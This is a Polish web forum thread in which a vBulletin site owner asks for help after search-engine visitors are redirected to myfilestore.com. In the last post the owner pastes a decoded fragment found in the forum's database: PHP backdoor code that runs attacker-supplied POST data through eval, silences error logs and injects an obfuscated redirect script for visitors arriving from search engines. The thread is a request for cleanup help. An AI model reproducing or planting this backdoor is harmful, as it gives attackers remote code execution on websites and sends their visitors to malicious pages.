Skocz do zawartości
Zaloguj się, aby obserwować  
kuba.3477

wirus vbulletin (proszę o pomoc)

Polecane posty

Cześć,

 

mam taki dziwny problem na forum vbulletin (3.8.7). Dzisiaj szukałem czegoś w google i wszedłem na moje forum przez link w wynikach wyszukiwania google. Co ciekawe zamiast forum w pasku pojawił się adres: myfilestore.com

 

Przeczytałem już wszystko w sieci na ten temat, jednak nic nie pomaga. Admin mojego dedyka również wszystko sprawdził i wydaje się nie być problemu z serwerem. Ma ktoś jakiś pomysł?

 

PS: Dodam jako ciekawostkę, że identyczny komunikat dostałem dzisiaj wchodząc na peb (również przez google).

Edytowano przez kuba.3477 (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Masz doklejny gdzieś kod javascript który wykonuje się z apomcą unescape - przejrzyj pliki na ftp i szablony w bazie danych.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

To kogoś zatrudnij bo widać że nie ogarniasz tematu...

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

No właśnie działa najlepszy admin z wht i nie możemy nic znaleźć. Myślałem, że może ktoś z Was miał podobny problem i może coś doradzić.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Cześć,

 

coś takiego znaleźliśmy (rozkodowany fragment) w baza forum -> tabela datastore -> wpis plugins

 

if(isset($_POST[$x]))eval(base64_decode(str_rot13($_POST[$x])));unset($x);
ini_set('display_errors',0);ini_set('log_errors',0);
$r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER');
if(strlen($r)>10)
{
$ip=$_SERVER['REMOTE_ADDR'];$hn=@gethostbyaddr($ip);
if((strpos($ip,'65.55.')!==0)&&(strpos($hn,'msnbot')===false))
{
	$s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com');
	foreach($s as $e)
	{
			if((strpos($r,$e)!==false)&&(empty($_COOKIE['vbsp'])))
			{
					$h=strtoupper(substr(@md5($_SERVER['HTTP_HOST']),0,8));
					die("<html><head></head><body><script type=\"text/javascript\">var vbsp='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVLbctowFPwVmpmOpLFDuBgMcd1MQqBN703avlhqRwgBDmAcYy6J5X/vihQmU9vHZ7V7LvsgvZFzOl

 

Spotkaliście z takim problemem? Może wiecie, jak to wywalić całkowicie?

Edytowano przez kuba.3477 (zobacz historię edycji)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się

Zaloguj się, aby obserwować  

×